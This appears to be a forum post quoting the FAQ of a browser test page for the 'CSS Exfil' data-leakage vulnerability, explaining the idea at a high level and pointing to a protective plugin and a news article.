What is this CSS vulnerability again? The CSS Exfil vulnerability detailed in this lengthy post is a method attackers can use to steal data from web pages using Cascading Style Sheets (CSS). CSS - one of the building blocks of the modern web - is used by developers to control the look-and-feel of a website and is present on nearly every modern page on the internet. By crafting targeted CSS selectors and injecting them into a web page, an attacker can trick the page into sending pieces of data to a remote server (e.g. usernames, passwords, and sensitive data such as date of birth, social security numbers, and credit card numbers). How does this vulnerability tester page work? This page attempts to load four remote images using CSS selectors which parse a hidden text field. If it is able to load any of those four images your browser is vulnerable to the CSS Exfil attack. If the vulnerability doesn't involve JavaScript, why does the vulnerability tester require JavaScript? While the CSS Exfil attack doesn't require JavaScript to function, this page requires a few lines of JavaScript to check to see if the exploit succeeded in loading the images. This page tests to see if your browser is vulnerable to Cascading Style Sheets (CSS) data leakage. If you are vulnerable, one way to protect yourself is to install the CSS Exfil Protection plugin for your browser. https://www.mike-gualtieri.com/css-exfil-vulnerability-tester
Also as noted by a like article by bleepingcomputer.com: https://www.bleepingcomputer.com/ne...can-be-abused-to-collect-sensitive-user-data/
